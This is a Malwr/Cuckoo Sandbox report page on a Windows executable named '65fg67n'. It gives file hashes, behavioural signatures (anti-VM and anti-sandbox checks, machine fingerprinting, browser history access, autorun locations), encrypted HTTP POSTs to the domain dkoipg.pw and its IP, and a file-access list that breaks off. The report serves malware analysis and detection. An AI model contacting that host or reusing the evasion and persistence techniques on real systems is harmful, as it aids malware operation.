<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Malwr - Malware Analysis by Cuckoo Sandbox</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Submit malware for free analysis with Cuckoo Sandbox">
<meta name="keywords" content="sandbox, malware, online, submit, analysis, cuckoo, sample, download, trojan, apt">

<!-- Le styles -->
<link href="/static/css/bootstrap.min.css" rel="stylesheet">
<link href="/static/css/bootstrap-responsive.min.css" rel="stylesheet">
<link href="/static/css/style.css" rel="stylesheet">
<link href="/static/css/lightbox.css" rel="stylesheet">
<link href="/static/css/jasny-bootstrap.min.css" rel="stylesheet">
<link href="/static/css/jasny-bootstrap-responsive.min.css" rel="stylesheet">
<script src="/static/js/jquery.js"></script>
</head>
<body>
<div class="container-fluid">





<div class="tabbable tabs-left">
<ul class="nav nav-tabs">
<li class="active"><a href="#overview" data-toggle="tab">Quick Overview</a></li>
<li><a href="#static" data-toggle="tab">Static Analysis</a></li>
<li><a href="#behavior" data-toggle="tab" id="graph_hook">Behavioral Analysis</a></li>
<li><a href="#network" data-toggle="tab">Network Analysis</a></li>
<li><a href="#dropped" data-toggle="tab">Dropped Files</a></li>
<li><a href="#comments" data-toggle="tab">Comment Board (0)</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="overview">



<div class="alert alert-info">
<b>Tags</b>:
None
</div>

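<section id="information">
<!-- Analysis metadata as reported by the sandbox. The timestamps carry no time
     zone. The API-call timestamps further down this report read
     2016-02-16 17:41:35, about nine hours before the start time shown here, so
     the two clocks presumably use different zones; normalise both before
     correlating this run with other logs. -->
<div class="box">
<h4>Analysis</h4>
<div class="box-content" style="padding: 0;">
<table class="table table-striped">
<thead>
<tr>
<th scope="col">Category</th>
<th scope="col">Started</th>
<th scope="col">Completed</th>
<th scope="col">Duration</th>
</tr>
</thead>
<tbody>
<tr>
<td>FILE</td>
<td>2016-02-17 02:41:33</td>
<td>2016-02-17 02:43:52</td>
<td>139 seconds</td>
</tr>
</tbody>
</table>
</div>
</div>

</section>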
<hr />

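<section id="file">
<h4>File Details</h4>
<!-- Sample identity. Match on SHA256 (or SHA512): MD5, SHA1 and CRC32 are
     listed for lookups in older tooling, and known collision weaknesses make
     them unsuitable as the only match key. The ssdeep value is a fuzzy hash
     meant for similarity comparison, not exact matching. The file name is
     presumably the name supplied at submission and should not be used as an
     indicator on its own. "None matched" under Yara only says that no rule
     loaded by this sandbox fired; it is not a verdict on the file. -->
<div class="box">
<div class="box-content" style="padding: 0;">
<table class="table table-striped">
<tr>
<th scope="row" style="border-top: 0;">File Name</th>
<td style="border-top: 0;">65fg67n</td>
</tr>
<tr>
<th scope="row">File Size</th>
<td>208896 bytes</td>
</tr>
<tr>
<th scope="row">File Type</th>
<td>PE32 executable (GUI) Intel 80386, for MS Windows</td>
</tr>
<tr>
<th scope="row">MD5</th>
<td>e1a9b6f7285a85e682ebcad028472d13</td>
</tr>
<tr>
<th scope="row">SHA1</th>
<td>1347b810ac90c13154908f7cf45b11913c182e44</td>
</tr>
<tr>
<th scope="row">SHA256</th>
<td>5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8</td>
</tr>
<tr>
<th scope="row">SHA512</th>
<td>35e6adb72faba256c94a7abe205ff14752f46c830292905e24605a479d15b6aa6b4ccfcc6d4937dfad8698cfa8da4a4cd68b38ded5c14ed24127f605c6fe6874</td>
</tr>
<tr>
<th scope="row">CRC32</th>
<td>E4BE5457</td>
</tr>
<tr>
<th scope="row">Ssdeep</th>
<td>3072:esOe84dmDsobhW7CfhQ7J37HBWTH6sDq2bEGKPe59jLi7TuKmx5wxv+18:jr84+sqhkCepzBW3bNV5408</td>
</tr>
<tr>
<th scope="row">Yara</th>
<td>
None matched
</td>
</tr>
<tr>
<!-- The label cell is intentionally empty; the button never carried a valid
     link target (href is not a button attribute), so it is dropped here. -->
<td></td>
<td><button type="button" class="btn btn-primary btn-small" disabled>Download</button> <small><span class="muted">You need to login</span></small></td>
</tr>
</table>
</div>
</div>
</section>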

<hr />
<style>
/* Spacing for each signature banner in the Signatures list:
   5px on top, right and bottom, 10px on the left. */
.signature {
  padding: 5px 5px 5px 10px;
  margin-bottom: 5px;
}
</style>
<section id="signatures">
<h4>Signatures</h4>
<a style="text-decoration: none;" href="#signature_antivirus_virustotal" data-toggle="collapse">
<div class="alert signature">
File has been identified by at least one AntiVirus on VirusTotal as malicious</div></a>
<div id="signature_antivirus_virustotal" class="collapse">
</div>
<a style="text-decoration: none;" href="#signature_network_http" data-toggle="collapse">
<div class="alert signature">
Performs some HTTP requests</div></a>
<div id="signature_network_http" class="collapse">
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;http&#39;, u&#39;value&#39;: {u&#39;count&#39;: 1, u&#39;body&#39;: u&#39;\\xbf\\x9f\\x0e\\xa1\\xf5t\\xe5\\xbasCP\\xd7/\\xcb\\x81\\x8e^\\x84\\xc6\\xd4\\xef\\x11\\xd1\\x93\\xf8\\x90h\\xf6\\xc1\\x82\\xefOY~\\x17*\\xc5\\xda\\x80\\x84H:\\x8d\\xf9\\x1e+=\\x1c\\xa1\\xf9~Y\\x13\\x13\\x9a\\x90U\\x8d\\x99\\x14aG\\xa3\\xd2\\xd2\\x98o\\x16\\xba\\xed\\xc9\\xfe\\xee\\xdd\\x8d\\x8e\\xfa\\xc9\\x01e&amp;;\\xca.{\\xd4\\xa8\\xa7\\x11R\\x0b\\xb4\\xd9z_&#39;, u&#39;uri&#39;: u&#39;http://dkoipg.pw/main.php&#39;, u&#39;port&#39;: 80, u&#39;host&#39;: u&#39;dkoipg.pw&#39;, u&#39;version&#39;: u&#39;1.1&#39;, u&#39;path&#39;: u&#39;/main.php&#39;, u&#39;data&#39;: u&#39;POST /main.php HTTP/1.1\r\nHost: dkoipg.pw\r\nContent-Length: 95\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n\\xbf\\x9f\\x0e\\xa1\\xf5t\\xe5\\xbasCP\\xd7/\\xcb\\x81\\x8e^\\x84\\xc6\\xd4\\xef\\x11\\xd1\\x93\\xf8\\x90h\\xf6\\xc1\\x82\\xefOY~\\x17*\\xc5\\xda\\x80\\x84H:\\x8d\\xf9\\x1e+=\\x1c\\xa1\\xf9~Y\\x13\\x13\\x9a\\x90U\\x8d\\x99\\x14aG\\xa3\\xd2\\xd2\\x98o\\x16\\xba\\xed\\xc9\\xfe\\xee\\xdd\\x8d\\x8e\\xfa\\xc9\\x01e&amp;;\\xca.{\\xd4\\xa8\\xa7\\x11R\\x0b\\xb4\\xd9z_&#39;, u&#39;method&#39;: u&#39;POST&#39;}}, {u&#39;type&#39;: u&#39;http&#39;, u&#39;value&#39;: {u&#39;count&#39;: 1, u&#39;body&#39;: u&#39;v\\x8a\\x9eF\\xb3h4B(.%\\x1c\\xe6V\\x0b)\\xec\\xddj\\x82\\xc4\\x84\\x9b6*y\\x9c\\x8c\\xfb\\x9f\\xe0\\xcb\\x98\\x91\\xeaK\\x8a~Nc/\\xc2\\xdc\\xa4i\\xc43\\xb0\\xe5\\\\xff\\xb4\\xfei@\\x84\\xfeZv.\\xc7\\x04X\\x87\\xf7\\xc6\\x9a\\xa5\\xc0\\x8dC@?\\xbb\\xf0\\xad\\xc3\\xa6\\xdc1:$\\xc3)b\\xcafz\\x9b\\xca`K\\xc7]\\xc8\\x03\\x802:\\xabA&#39;, u&#39;uri&#39;: u&#39;http://dkoipg.pw/main.php&#39;, u&#39;port&#39;: 80, u&#39;host&#39;: u&#39;dkoipg.pw&#39;, u&#39;version&#39;: u&#39;1.1&#39;, u&#39;path&#39;: u&#39;/main.php&#39;, u&#39;data&#39;: u&#39;POST /main.php HTTP/1.1\r\nHost: dkoipg.pw\r\nContent-Length: 101\r\nConnection: Keep-Alive\r\nCache-Control: 
no-cache\r\n\r\nv\\x8a\\x9eF\\xb3h4B(.%\\x1c\\xe6V\\x0b)\\xec\\xddj\\x82\\xc4\\x84\\x9b6*y\\x9c\\x8c\\xfb\\x9f\\xe0\\xcb\\x98\\x91\\xeaK\\x8a~Nc/\\xc2\\xdc\\xa4i\\xc43\\xb0\\xe5\\\\xff\\xb4\\xfei@\\x84\\xfeZv.\\xc7\\x04X\\x87\\xf7\\xc6\\x9a\\xa5\\xc0\\x8dC@?\\xbb\\xf0\\xad\\xc3\\xa6\\xdc1:$\\xc3)b\\xcafz\\x9b\\xca`K\\xc7]\\xc8\\x03\\x802:\\xabA&#39;, u&#39;method&#39;: u&#39;POST&#39;}}, {u&#39;type&#39;: u&#39;http&#39;, u&#39;value&#39;: {u&#39;count&#39;: 1, u&#39;body&#39;: u&quot;\\xb7\\x8e\\x92\\xf0\\xc8\\xf1\\xf3[7\\xa9\\xbc\\xc4M&gt;\\xf0\\x13\\xad\\xfdz\n\\x00\\xe6\\xaa.&amp;\\xff_m\\x8b&#39;\\xbce\\xca\\xc8&gt;\\xb1\\x1f72\\xed\\xd0\r{\\xe8\\x00q\\xbb\\x1a\\x19\\xa0\\x85\\x89\\xe10\\x0f&quot;, u&#39;uri&#39;: u&#39;http://dkoipg.pw/main.php&#39;, u&#39;port&#39;: 80, u&#39;host&#39;: u&#39;dkoipg.pw&#39;, u&#39;version&#39;: u&#39;1.1&#39;, u&#39;path&#39;: u&#39;/main.php&#39;, u&#39;data&#39;: u&quot;POST /main.php HTTP/1.1\r\nHost: dkoipg.pw\r\nContent-Length: 55\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n\\xb7\\x8e\\x92\\xf0\\xc8\\xf1\\xf3[7\\xa9\\xbc\\xc4M&gt;\\xf0\\x13\\xad\\xfdz\n\\x00\\xe6\\xaa.&amp;\\xff_m\\x8b&#39;\\xbce\\xca\\xc8&gt;\\xb1\\x1f72\\xed\\xd0\r{\\xe8\\x00q\\xbb\\x1a\\x19\\xa0\\x85\\x89\\xe10\\x0f&quot;, u&#39;method&#39;: u&#39;POST&#39;}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_antivm_generic_bios" data-toggle="collapse">
<div class="alert alert-error signature">
Checks the BIOS version, possibly for anti-virtualization</div></a>
<div id="signature_antivm_generic_bios" class="collapse">
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,193&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x00000088&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;SystemBiosVersion&#39;}], u&#39;id&#39;: 79}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_antisandbox_sleep" data-toggle="collapse">
<div class="alert alert-error signature">
A process attempted to delay the analysis task by a long amount of time.</div></a>
<div id="signature_antisandbox_sleep" class="collapse">
<div><b>Process</b>: rundll32.exe tried to sleep 1566804 seconds, actually delayed analysis time by 0 seconds</div>
</div>
<!-- Browser information-stealer signature. Both hits below are NtCreateFile
     calls by 65fg67n.exe (process id 1592) on the Internet Explorer
     History.IE5 index.dat file; no read or exfiltration of its contents is
     shown in these entries.
     NOTE(review): the Files summary of this report also lists the Temporary
     Internet Files and Cookies index.dat files. Processes that use the system
     HTTP stack commonly open that set of files, so this match alone may be a
     side effect of the HTTP requests; confirm against read activity in the
     Behavioral Analysis tab before reporting data theft. -->
<a style="text-decoration: none;" href="#signature_infostealer_browser" data-toggle="collapse">
<div class="alert alert-error signature">
Steals private information from local Internet browsers</div></a>
<div id="signature_infostealer_browser" class="collapse">
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;filesystem&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,313&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;NtCreateFile&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;ShareAccess&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileName&#39;, u&#39;value&#39;: u&#39;C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat&#39;}, {u&#39;name&#39;: u&#39;DesiredAccess&#39;, u&#39;value&#39;: u&#39;0xc0100080&#39;}, {u&#39;name&#39;: u&#39;CreateDisposition&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileHandle&#39;, u&#39;value&#39;: u&#39;0x000000e8&#39;}], u&#39;id&#39;: 604}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;filesystem&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,313&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;NtCreateFile&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;ShareAccess&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileName&#39;, u&#39;value&#39;: u&#39;C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat&#39;}, {u&#39;name&#39;: u&#39;DesiredAccess&#39;, u&#39;value&#39;: u&#39;0xc0100080&#39;}, {u&#39;name&#39;: u&#39;CreateDisposition&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileHandle&#39;, u&#39;value&#39;: u&#39;0x000000e8&#39;}], u&#39;id&#39;: 607}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_recon_fingerprint" data-toggle="collapse">
<div class="alert alert-error signature">
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)</div></a>
<div id="signature_recon_fingerprint" class="collapse">
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,293&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c4&#39;}, {u&#39;name&#39;: u&#39;DataLength&#39;, u&#39;value&#39;: u&#39;37&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}, {u&#39;name&#39;: u&#39;Type&#39;, u&#39;value&#39;: u&#39;1&#39;}], u&#39;id&#39;: 379}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,293&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c4&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;e97bd94f-e805-4c92-9982-42f7c80101bf\\x00&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}], u&#39;id&#39;: 380}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,303&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c8&#39;}, {u&#39;name&#39;: u&#39;DataLength&#39;, u&#39;value&#39;: u&#39;37&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}, {u&#39;name&#39;: u&#39;Type&#39;, u&#39;value&#39;: u&#39;1&#39;}], u&#39;id&#39;: 433}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,303&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c8&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;e97bd94f-e805-4c92-9982-42f7c80101bf\\x00&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}], u&#39;id&#39;: 434}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:39,499&#39;, u&#39;thread_id&#39;: u&#39;768&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000001a4&#39;}, {u&#39;name&#39;: u&#39;DataLength&#39;, u&#39;value&#39;: u&#39;37&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}, {u&#39;name&#39;: u&#39;Type&#39;, u&#39;value&#39;: u&#39;1&#39;}], u&#39;id&#39;: 6235}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:39,499&#39;, u&#39;thread_id&#39;: u&#39;768&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000001a4&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;e97bd94f-e805-4c92-9982-42f7c80101bf\\x00&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}], u&#39;id&#39;: 6236}}]</div>
</div>
<!-- Persistence signature. Each "signs" entry below names a registry key or
     folder that matched the rule. "process" is None for every entry, and the
     entries do not show whether the location was written or only opened or
     enumerated.
     NOTE(review): the Startup folder also appears in the Files summary of
     this report with a trailing \* pattern, which looks like directory
     enumeration. Confirm an actual write in the Behavioral Analysis tab
     before treating any of these locations as a persistence artefact. -->
<a style="text-decoration: none;" href="#signature_persistence_autorun" data-toggle="collapse">
<div class="alert alert-error signature">
Installs itself for autorun at Windows startup</div></a>
<div id="signature_persistence_autorun" class="collapse">
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;registry&#39;, u&#39;value&#39;: u&#39;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run&#39;}]</div>
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;registry&#39;, u&#39;value&#39;: u&#39;HKEY_USERS\\S-1-5-21-1547161642-507921405-839522115-1004\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon&#39;}]</div>
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;registry&#39;, u&#39;value&#39;: u&#39;HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\services\\RDPNP\\NetworkProvider&#39;}]</div>
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;file&#39;, u&#39;value&#39;: u&#39;c:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup&#39;}]</div>
</div>
</section>
<hr />

<section id="screenshots">
<h4>Screenshots</h4>
<div>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/2c0d1728bd6cd042eb0270f26a6ffb1fb88aa7467d4147b422d31bf1c630b04a/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/2c0d1728bd6cd042eb0270f26a6ffb1fb88aa7467d4147b422d31bf1c630b04a/" style="height: 120px;" /></a>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/0eaaeb9a2f84ff2abe8f1bbc8664b2fc8b2ac80776035d82d34aa75abba9c486/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/0eaaeb9a2f84ff2abe8f1bbc8664b2fc8b2ac80776035d82d34aa75abba9c486/" style="height: 120px;" /></a>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/e394f4425c11621b2e6e3e73426076a48c5878b8bc194c8296d9a17569e11945/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/e394f4425c11621b2e6e3e73426076a48c5878b8bc194c8296d9a17569e11945/" style="height: 120px;" /></a>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/db93b8fc19d25784dc5f86929db7583564e6988173cd2db491fb4369c0daf81c/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/db93b8fc19d25784dc5f86929db7583564e6988173cd2db491fb4369c0daf81c/" style="height: 120px;" /></a>
</div>
</section>
<hr />
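<!-- Network indicators observed during this run (analysis dated 2016-02-17).
     The domain-to-IP pairing is a point-in-time resolution taken inside the
     sandbox. NOTE(review): re-check current resolution and hosting before
     using either value in a blocklist, since the address may have been
     reassigned or may be shared with unrelated sites. Both values are kept as
     plain text, not links, so they cannot be followed by accident. -->
<div class="row-fluid">
<div class="span6"><section id="hosts">
<h4>Hosts</h4>
<table class="table table-striped table-bordered">
<tr>
<th scope="col">IP</th>
</tr>
<tr>
<td>85.25.149.246</td>
</tr>
</table>
</section>
</div>
<div class="span6"><section id="domains">
<h4>Domains</h4>
<table class="table table-striped table-bordered">
<tr>
<th scope="col">Domain</th>
<th scope="col">IP</th>
</tr>
<tr>
<td>dkoipg.pw</td>
<td>85.25.149.246</td>
</tr>
</table>
</section>
</div>
</div>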
<hr />
<section id="summary">
<h4>Summary</h4>
<div class="tabbable tabs">
<ul class="nav nav-pills" style="margin-bottom: 0;">
<li class="active"><a href="#summary_files" data-toggle="tab">Files</a></li>
<li><a href="#summary_keys" data-toggle="tab">Registry Keys</a></li>
<li><a href="#summary_mutexes" data-toggle="tab">Mutexes</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="summary_files">
<div class="well mono">
C:\<br />
C:\WINDOWS<br />
C:\WINDOWS\<br />
C:<br />
MountPointManager<br />
C:\WINDOWS\system32\rsaenh.dll<br />
PIPE\lsarpc<br />
C:\Documents and Settings\User\Local Settings\Temporary Internet Files<br />
C:\Documents and Settings\User\Local Settings\History<br />
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\<br />
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\index.dat<br />
C:\Documents and Settings\User\Cookies\<br />
C:\Documents and Settings\User\Cookies\index.dat<br />
C:\Documents and Settings\User\Local Settings\History\History.IE5\<br />
C:\Documents and Settings\User\Local Settings\History\History.IE5\index.dat<br />
c:\autoexec.bat<br />
C:\Documents and Settings<br />
C:\Documents and Settings\User\Local Settings<br />
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk<br />
C:\WINDOWS\system32\Ras\*.pbk<br />
C:\Documents and Settings\User\Application Data\Microsoft\Network\Connections\Pbk\*.pbk<br />
c:\*<br />
C:\DOCUME~1\User\LOCALS~1\Temp<br />
c:\Documents and Settings\*<br />
c:\Documents and Settings<br />
c:\Documents and Settings\All Users\*<br />
c:\Documents and Settings\All Users<br />
c:\Documents and Settings\All Users\Desktop\*<br />
c:\Documents and Settings\All Users\Desktop<br />
c:\Documents and Settings\All Users\Documents\*<br />
c:\Documents and Settings\All Users\Documents<br />
c:\Documents and Settings\All Users\Documents\My Music\*<br />
c:\Documents and Settings\All Users\Documents\My Music<br />
c:\Documents and Settings\All Users\Documents\My Music\My Playlists\*<br />
c:\Documents and Settings\All Users\Documents\My Music\My Playlists<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\*<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\*<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0007907E\*<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0007907E<br />
c:\Documents and Settings\All Users\Documents\My Pictures\*<br />
c:\Documents and Settings\All Users\Documents\My Pictures<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\*<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures<br />
c:\Documents and Settings\All Users\Documents\My Videos\*<br />
c:\Documents and Settings\All Users\Documents\My Videos<br />
c:\Documents and Settings\All Users\Favorites\*<br />
c:\Documents and Settings\All Users\Favorites<br />
c:\Documents and Settings\All Users\Start Menu\*<br />
c:\Documents and Settings\All Users\Start Menu<br />
c:\Documents and Settings\All Users\Start Menu\Programs\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Games\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Games<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\Microsoft Office Tools\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\Microsoft Office Tools<br />
